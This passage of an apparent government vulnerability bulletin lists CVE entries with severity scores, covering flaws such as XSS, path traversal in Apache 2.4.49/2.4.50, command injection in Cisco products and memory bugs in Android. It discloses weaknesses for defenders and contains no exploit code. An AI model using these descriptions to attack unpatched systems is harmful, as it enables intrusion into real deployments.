php -- phpIn PHP versions 7.3.x below 7.3.31, 7.4.x below 7.4.24 and 8.0.x below 8.0.11, in Microsoft Windows environment, ZipArchive::extractTo may be tricked into writing a file outside target directory when extracting a ZIP file, thus potentially causing files to be created or overwritten, subject to OS permissions.2021-10-044.3CVE-2021-21706
CONFIRM
php -- phpIn PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using URL validation functionality via filter_var() function with FILTER_VALIDATE_URL parameter, an URL with invalid password field can be accepted as valid. This can lead to the code incorrectly parsing the URL and potentially leading to other security implications - like contacting a wrong server or making a wrong access decision.2021-10-045CVE-2021-21705
CONFIRM
php -- phpIn PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using Firebird PDO driver extension, a malicious database server could cause crashes in various database functions, such as getAttribute(), execute(), fetch() and others by returning invalid response data that is not parsed correctly by the driver. This can result in crashes, denial of service or potentially memory corruption.2021-10-044.3CVE-2021-21704
CONFIRM
CONFIRM
CONFIRM
CONFIRM
pixeline -- bugsCross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below version allows remote attackers to inject arbitrary web script or HTML via the email parameter.2021-10-014.3CVE-2021-40923
MISC
MISC
pixeline -- bugsCross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below version allows remote attackers to inject arbitrary web script or HTML via the first_name parameter.2021-10-014.3CVE-2021-40924
MISC
MISC
pixeline -- bugsCross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below version allows remote attackers to inject arbitrary web script or HTML via the last_name parameter.2021-10-014.3CVE-2021-40922
MISC
MISC
redis -- hiredisHiredis is a minimalistic C client library for the Redis database. In affected versions Hiredis is vulnurable to integer overflow if provided maliciously crafted or corrupted `RESP` `mult-bulk` protocol data. When parsing `multi-bulk` (array-like) replies, hiredis fails to check if `count * sizeof(redisReply*)` can be represented in `SIZE_MAX`. If it can not, and the `calloc()` call doesn't itself make this check, it would result in a short allocation and subsequent buffer overflow. Users of hiredis who are unable to update may set the [maxelements](https://github.com/redis/hiredis#reader-max-array-elements) context option to a value small enough that no overflow is possible.2021-10-046.5CVE-2021-32765
MISC
CONFIRM
MISC
redislabs -- redisRedis is an open source, in-memory database that persists on disk. When using the Redis Lua Debugger, users can send malformed requests that cause the debugger’s protocol parser to read data beyond the actual buffer. This issue affects all versions of Redis with Lua debugging support (3.2 or newer). The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14.2021-10-044CVE-2021-32672
CONFIRM
MISC
scalabium -- dbase_viewerScalabium dBase Viewer version 2.6 (Build 5.751) is vulnerable to remote code execution via a crafted DBF file that triggers a buffer overflow. An attacker can use the Structured Exception Handler (SEH) records and redirect execution to attacker-controlled code.2021-10-016.8CVE-2021-35297
MISC
spotweb_project -- spotwebCross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.2021-10-014.3CVE-2021-40973
MISC
MISC
spotweb_project -- spotwebCross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.2021-10-014.3CVE-2021-40971
MISC
MISC
spotweb_project -- spotwebCross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.2021-10-014.3CVE-2021-40970
MISC
MISC
spotweb_project -- spotwebCross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.2021-10-014.3CVE-2021-40968
MISC
MISC
spotweb_project -- spotwebCross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.2021-10-014.3CVE-2021-40972
MISC
MISC
thycotic -- secret_serverA SQL injection issue was discovered in ThycoticCentrify Secret Server before 11.0.000007. The only affected versions are 10.9.000032 through 11.0.000006.2021-10-014CVE-2021-41845
MISC
MISC
tibco -- activespacesThe FTL Server (tibftlserver) and Docker images containing tibftlserver components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition, TIBCO ActiveSpaces - Developer Edition, TIBCO ActiveSpaces - Enterprise Edition, TIBCO FTL - Community Edition, TIBCO FTL - Developer Edition, TIBCO FTL - Enterprise Edition, TIBCO eFTL - Community Edition, TIBCO eFTL - Developer Edition, and TIBCO eFTL - Enterprise Edition contain a vulnerability that theoretically allows a non-administrative, authenticated FTL user to trick the affected components into creating illegitimate certificates. These maliciously generated certificates can be used to enable man-in-the-middle attacks or to escalate privileges so that the malicious user has administrative privileges. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Developer Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Enterprise Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO FTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, and TIBCO eFTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0.2021-10-056CVE-2021-35497
CONFIRM
CONFIRM
typo3 -- typo3TYPO3 is an open source PHP based web content management system released under the GNU GPL. It has been discovered that the new TYPO3 v11 feature that allows users to create and share deep links in the backend user interface is vulnerable to cross-site-request-forgery. The impact is the same as described in TYPO3-CORE-SA-2020-006 (CVE-2020-11069). However, it is not limited to the same site context and does not require the attacker to be authenticated. In a worst case scenario, the attacker could create a new admin user account to compromise the system. To successfully carry out an attack, an attacker must trick his victim to access a compromised system. The victim must have an active session in the TYPO3 backend at that time. The following Same-Site cookie settings in $GLOBALS[TYPO3_CONF_VARS][BE][cookieSameSite] are required for an attack to be successful: SameSite=strict: malicious evil.example.org invoking TYPO3 application at good.example.org and SameSite=lax or none: malicious evil.com invoking TYPO3 application at example.org. Update your instance to TYPO3 version 11.5.0 which addresses the problem described.2021-10-056.8CVE-2021-41113
MISC
CONFIRM
MISC
typo3 -- typo3TYPO3 is an open source PHP based web content management system released under the GNU GPL. It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP Host header. TYPO3 uses the HTTP Host header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment. This vulnerability is the same as described in TYPO3-CORE-SA-2014-001 (CVE-2014-3941). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting $GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern'] (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.2021-10-055CVE-2021-41114
CONFIRM
MISC
MISC
wowza -- streaming_engineA Cross-Site Request Forgery (CSRF) vulnerability in Wowza Streaming Engine through 4.8.11+5 allows a remote attacker to delete a user account via the /enginemanager/server/user/delete.htm userName parameter. The application does not implement a CSRF token for the GET request.2021-10-055.8CVE-2021-35491
MISC
MISC
MISC
wowza -- streaming_engineWowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.)2021-10-054CVE-2021-35492
MISC
MISC
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
calibre-web_project -- calibre-webIn “Calibre-web” application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in “Metadata”. An attacker that has access to edit the metadata information, can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.2021-10-043.5CVE-2021-25964
MISC
MISC
canonical -- apportFunction check_attachment_for_errors() in file data/general-hooks/ubuntu.py could be tricked into exposing private data via a constructed crash file. This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;2021-10-012.1CVE-2021-3709
MISC
MISC
MISC
MISC
cminds -- enhanced-tooltipglossaryThe CM Tooltip Glossary WordPress plugin before 3.9.21 does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks2021-10-043.5CVE-2021-24678
MISC
dwbooster -- appointment_hour_bookingThe Appointment Hour Booking WordPress plugin before 1.3.16 does not escape some of the Calendar Form settings, allowing high privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.2021-10-043.5CVE-2021-24673
MISC
esri -- portal_for_arcgisStored cross-site scripting (XSS) issue in Esri Portal for ArcGIS may allow a remote unauthenticated attacker to pass and store malicious strings in the home application.2021-10-013.5CVE-2021-29110
CONFIRM
gitlab -- gitlabA stored Cross-Site Scripting vulnerability in the GitLab Flavored Markdown in GitLab CE/EE version 8.4 and above allowed an attacker to execute arbitrary JavaScript code on the victim's behalf.2021-10-053.5CVE-2021-39887
MISC
CONFIRM
MISC
gitlab -- gitlabIn all versions of GitLab CE/EE since version 7.7, the application may let a malicious user create an OAuth client application with arbitrary scope names which may allow the malicious user to trick unsuspecting users to authorize the malicious client application using the spoofed scope name and description.2021-10-053.5CVE-2021-39881
MISC
CONFIRM
MISC
gitlab -- gitlabA stored Cross-Site Scripting vulnerability in the Jira integration in GitLab version 13.7 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf via malicious Jira API responses2021-10-053.5CVE-2021-22261
MISC
CONFIRM
MISC
google -- androidIn ellipsize of Layout.java, there is a possible ANR due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-1889139432021-10-061.9CVE-2021-0687
MISC
google -- androidIn sendAccessibilityEvent of NotificationManagerService.java, there is a possible disclosure of notification data due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-1596245552021-10-062.1CVE-2021-0682
MISC
google -- androidIn conditionallyRemoveIdentifiers of SubscriptionController.java, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-1810534622021-10-062.1CVE-2021-0644
MISC
google -- androidIn openFile of HeapDumpProvider.java, there is a possible way to retrieve generated heap dumps from debuggable apps due to an unprotected provider. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-1840469482021-10-062.1CVE-2021-0693
MISC
google -- androidIn getDefaultSmsPackage of RoleManagerService.java, there is a possible way to get information about the default sms app of a different device user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-1779278312021-10-062.1CVE-2021-0686
MISC
google -- androidIn RGB_to_BGR1_portable of SkSwizzler_opts.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-1901882642021-10-062.1CVE-2021-0689
MISC
google -- androidIn system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-1925353372021-10-062.1CVE-2021-0681
MISC
google -- androidIn get_sock_stat of xt_qtaguid.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-184018316References: Upstream kernel2021-10-062.1CVE-2021-0695
MISC
google -- androidIn system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-1925356762021-10-062.1CVE-2021-0680
MISC
ibm -- sterling_b2b_integratorIBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 202268.2021-10-063.5CVE-2021-29764
XF
CONFIRM
icehrm -- icehrmA Stored Cross Site Scripting vulnerability via Malicious File Upload exists in multiple pages of IceHrm 30.0.0.OS that allows for arbitrary execution of JavaScript commands.2021-10-043.5CVE-2021-38822
MISC
maccms -- maccmsMaccms 10 contains a cross-site scripting (XSS) vulnerability in the Editing function under the Member module. This vulnerability is exploited via a crafted payload in the nickname text field.2021-10-043.5CVE-2020-21434
MISC
qnap -- image2pdfA cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Image2PDF. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Image2PDF: Image2PDF 2.1.5 ( 2021/08/17 ) and later2021-10-013.5CVE-2021-38675
MISC
qnap -- photo_stationA cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 6.0.18 ( 2021/09/01 ) and later2021-10-013.5CVE-2021-34356
MISC
qnap -- photo_stationA cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 5.4.10 ( 2021/08/19 ) and later Photo Station 5.7.13 ( 2021/08/19 ) and later Photo Station 6.0.18 ( 2021/09/01 ) and later2021-10-013.5CVE-2021-34355
MISC
qnap -- photo_stationA cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 6.0.18 ( 2021/09/01 ) and later2021-10-013.5CVE-2021-34354
MISC
telegram -- telegramThe Telegram application 7.5.0 through 7.8.0 for Android does not properly implement image self-destruction, a different vulnerability than CVE-2019-16248. After approximately two to four uses of the self-destruct feature, there is a misleading UI indication that an image was deleted (on both the sender and recipient sides). The images are still present in the /Storage/Emulated/0/Telegram/Telegram Image/ directory.2021-10-042.1CVE-2021-41861
MISC
MISC
MISC
MISC
webnus -- modern_events_calendar_liteThe Modern Events Calendar Lite WordPress plugin before 5.22.2 does not escape some of its settings before outputting them in attributes, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.2021-10-043.5CVE-2021-24687
MISC
wpeverest -- user_registrationThe User Registration WordPress plugin before 2.0.2 does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as subscriber, to perform Stored Cross-Site attacks when their profile is viewed2021-10-043.5CVE-2021-24654
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
N/A -- N/A
 
IBM PowerVM Hypervisor FW1010 could allow a privileged user to gain access to another VM due to assigning duplicate WWPNs. IBM X-Force ID: 210162.2021-10-06not yet calculatedCVE-2021-38923
XF
CONFIRM
N/A -- N/A
 
ACINQ Eclair before 0.6.3 allows loss of funds because of dust HTLC exposure.2021-10-04not yet calculatedCVE-2021-41591
MISC
MISC
MISC
MISC
accel-ppp -- accel-ppp
 
ACCEL-PPP 1.12.0 has an out-of-bounds read in triton_context_schedule if the client exits after authentication.2021-10-07not yet calculatedCVE-2021-42054
MISC
adobe -- acrobat_reader_dc
 
Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability when processing AcroForm listbox that could result in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.2021-10-07not yet calculatedCVE-2021-40725
MISC
adobe -- acrobat_reader_dc
 
Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability when processing AcroForm field that could result in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.2021-10-07not yet calculatedCVE-2021-40726
MISC
adobe -- xmp_toolkit_sdk
 
XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a specially-crafted .cpp file.2021-10-04not yet calculatedCVE-2021-36051
MISC
afian -- filerun_2021.03.26
 
Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the magick binary.2021-10-05not yet calculatedCVE-2021-35505
MISC
MISC
afian -- filerun_2021.03.26
 
Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the ffmpeg binary.2021-10-05not yet calculatedCVE-2021-35504
MISC
MISC
akamai -- enterprise_application_access_client
 
In Akamai EAA (Enterprise Application Access) Client before 2.3.1, 2.4.x before 2.4.1, and 2.5.x before 2.5.3, an unquoted path may allow an attacker to hijack the flow of execution.2021-10-04not yet calculatedCVE-2021-40683
MISC
CONFIRM
alkacon -- opencms
 
An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.2021-10-08not yet calculatedCVE-2021-3312
MISC
MISC
apache -- http_server_2.4
 
While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.2021-10-05not yet calculatedCVE-2021-41524
MISC
MLIST
FEDORA
CISCO
apache -- http_server_2.4.49
 
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.2021-10-05not yet calculatedCVE-2021-41773
MISC
MLIST
MLIST
MLIST
MISC
MLIST
MISC
MLIST
MLIST
MLIST
CISCO
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache -- http_server_2.4.50
 
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.2021-10-07not yet calculatedCVE-2021-42013
MISC
MLIST
MLIST
MLIST
CISCO
JVN
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache -- openoffice
 
While working on Apache OpenOffice 4.1.8 a developer discovered that the DEB package did not install using root, but instead used a userid and groupid of 500. This both caused issues with desktop integration and could allow a crafted attack on files owned by that user or group if they exist. Users who installed the Apache OpenOffice 4.1.8 DEB packaging should upgrade to the latest version of Apache OpenOffice.2021-10-07not yet calculatedCVE-2021-28129
MISC
MLIST
MLIST
MLIST
apache -- openoffice
 
Apache OpenOffice has a dependency on expat software. Versions prior to 2.1.0 were subject to CVE-2013-0340 a "Billion Laughs" entity expansion denial of service attack and exploit via crafted XML files. ODF files consist of a set of XML files. All versions of Apache OpenOffice up to 4.1.10 are subject to this issue. expat in version 4.1.11 is patched.2021-10-07not yet calculatedCVE-2021-40439
MISC
MLIST
MLIST
MLIST
axis -- axis_devices
 
A user controlled parameter related to SMTP test functionality is not correctly validated making it possible to bypass blocked network recipients.2021-10-05not yet calculatedCVE-2021-31987
MISC
axis -- axis_devices
 
A user controlled parameter related to SMTP test functionality is not correctly validated making it possible to add the Carriage Return and Line Feed (CRLF) control characters and include arbitrary SMTP headers in the generated test email.2021-10-05not yet calculatedCVE-2021-31988
MISC
axis -- axis_devices
 
User controlled parameters related to SMTP notifications are not correctly validated. This can lead to a buffer overflow resulting in crashes and data leakage.2021-10-05not yet calculatedCVE-2021-31986
MISC
ballistix_mod_utility -- ballistix_mod_utility
 
Ballistix MOD Utility through 2.0.2.5 is vulnerable to privilege escalation in the MODAPI.sys driver component. The vulnerability is triggered by sending a specific IOCTL request that allows low-privileged users to directly interact with physical memory via the MmMapIoSpace function call (mapping physical memory into a virtual address space). Attackers could exploit this issue to achieve local privilege escalation to NT AUTHORITY\SYSTEM.2021-10-04not yet calculatedCVE-2021-41285
MISC
MISC
biqs_it_biqs-drive -- biqs_it_biqs-drive
 
A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.2021-10-04not yet calculatedCVE-2021-39433
MISC
MISC
bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
 
Login with hash: The login routine allows the client to log in to the system not by using the password, but by using the hash of the password. Combined with CVE-2021-23858, this allows an attacker to subsequently login to the system.2021-10-04not yet calculatedCVE-2021-23857
CONFIRM
bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
 
The user and password data base is exposed by an unprotected web server resource. Passwords are hashed with a weak hashing algorithm and therefore allow an attacker to determine the password by using rainbow tables.2021-10-04not yet calculatedCVE-2021-23855
CONFIRM
bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
 
Information disclosure: The main configuration, including users and their hashed passwords, is exposed by an unprotected web server resource and can be accessed without authentication. Additionally, device details are exposed which include the serial number and the firmware version by another unprotected web server resource.2021-10-04not yet calculatedCVE-2021-23858
CONFIRM
boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120An attacker with physical access to the device can extract the binary that checks for the hardware key and reverse engineer it, which could be used to create a physical duplicate of a valid hardware key. The hardware key allows access to special settings when inserted.2021-10-04not yet calculatedCVE-2021-38394
MISC
boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120The affected device uses off-the-shelf software components that contain unpatched vulnerabilities. A malicious attacker with physical access to the affected device could exploit these vulnerabilities.2021-10-04not yet calculatedCVE-2021-38398
MISC
boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120An attacker with physical access to Boston Scientific Zoom Latitude Model 3120 can remove the hard disk drive or create a specially crafted USB to extract the password hash for brute force reverse engineering of the system password.2021-10-04not yet calculatedCVE-2021-38400
MISC
boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120The programmer installation utility does not perform a cryptographic authenticity or integrity checks of the software on the flash drive. An attacker could leverage this weakness to install unauthorized software using a specially crafted USB.2021-10-04not yet calculatedCVE-2021-38396
MISC
boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
 
A skilled attacker with physical access to the affected device can gain access to the hard disk drive of the device to change the telemetry region and could use this setting to interrogate or program an implantable device in any region in the world.2021-10-04not yet calculatedCVE-2021-38392
MISC
cisco -- anyconnect_secure_mobility_client
 
A vulnerability in the shared library loading mechanism of Cisco AnyConnect Secure Mobility Client for Linux and Mac OS could allow an authenticated, local attacker to perform a shared library hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to a race condition in the signature verification process for shared library files that are loaded on an affected device. An attacker could exploit this vulnerability by sending a series of crafted interprocess communication (IPC) messages to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected device with root privileges. To exploit this vulnerability, the attacker must have a valid account on the system.2021-10-06not yet calculatedCVE-2021-34788
CISCO
cisco -- asyncos
 
A vulnerability in the proxy service of Cisco AsyncOS for Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to exhaust system memory and cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper memory management in the proxy service of an affected device. An attacker could exploit this vulnerability by establishing a large number of HTTPS connections to the affected device. A successful exploit could allow the attacker to cause the system to stop processing new connections, which could result in a DoS condition. Note: Manual intervention may be required to recover from this situation.2021-10-06not yet calculatedCVE-2021-34698
CISCO
cisco -- asyncos_software
 
A vulnerability in the antispam protection mechanisms of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass the URL reputation filters on an affected device. This vulnerability is due to improper processing of URLs. An attacker could exploit this vulnerability by crafting a URL in a particular way. A successful exploit could allow the attacker to bypass the URL reputation filters that are configured for an affected device, which could allow malicious URLs to pass through the device.2021-10-06not yet calculatedCVE-2021-1534
CISCO
cisco -- ata_190_series_analog_telephone_adapter_software
 
Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.2021-10-06not yet calculatedCVE-2021-34710
CISCO
cisco -- ata_190_series_analog_telephone_adapter_software
 
Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.2021-10-06not yet calculatedCVE-2021-34735
CISCO
cisco -- business_220_series_smart_switches_firmware
 
Multiple vulnerabilities in Cisco Business 220 Series Smart Switches firmware could allow an attacker with Administrator privileges to access sensitive login credentials or reconfigure the passwords on the user account. For more information about these vulnerabilities, see the Details section of this advisory.2021-10-06not yet calculatedCVE-2021-34744
CISCO
cisco -- business_220_series_smart_switches_firmware
 
Multiple vulnerabilities in Cisco Business 220 Series Smart Switches firmware could allow an attacker with Administrator privileges to access sensitive login credentials or reconfigure the passwords on the user account. For more information about these vulnerabilities, see the Details section of this advisory.2021-10-06not yet calculatedCVE-2021-34757
CISCO
cisco -- dna_center
 
A vulnerability in the API endpoints for Cisco DNA Center could allow an authenticated, remote attacker to gain access to sensitive information that should be restricted. The attacker must have valid device credentials. This vulnerability is due to improper access controls on API endpoints. An attacker could exploit the vulnerability by sending a specific API request to an affected application. A successful exploit could allow the attacker to obtain sensitive information about other users who are configured with higher privileges on the application.2021-10-06not yet calculatedCVE-2021-34782
CISCO
cisco -- identity_services_engine
 
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.2021-10-06not yet calculatedCVE-2021-34706
CISCO
cisco -- identity_services_engine
 
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information. This vulnerability is due to improper enforcement of administrator privilege levels for low-value sensitive data. An attacker with read-only administrator access to the web-based management interface could exploit this vulnerability by browsing to the page that contains the sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.2021-10-06not yet calculatedCVE-2021-34702
CISCO
cisco -- identity_services_engine
 
A vulnerability in the REST API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to perform a command injection attack and elevate privileges to root. This vulnerability is due to insufficient input validation for specific API endpoints. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting and modifying specific internode communications from one ISE persona to another ISE persona. A successful exploit could allow the attacker to run arbitrary commands with root privileges on the underlying operating system. To exploit this vulnerability, the attacker would need to decrypt HTTPS traffic between two ISE personas that are located on separate nodes.2021-10-06not yet calculatedCVE-2021-1594
CISCO
cisco -- intersight_virtual_appliance
 
A vulnerability in the web-based management interface of Cisco Intersight Virtual Appliance could allow an authenticated, remote attacker to perform a command injection attack on an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using the web-based management interface to execute a command using crafted input. A successful exploit could allow the attacker to execute arbitrary commands using root-level privileges on an affected device.2021-10-06not yet calculatedCVE-2021-34748
CISCO
cisco -- ip_phone_software
 
A vulnerability in the debug shell of Cisco IP Phone software could allow an authenticated, local attacker to read any file on the device file system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted input to a debug shell command. A successful exploit could allow the attacker to read any file on the device file system.2021-10-06not yet calculatedCVE-2021-34711
CISCO
cisco -- orbital
 
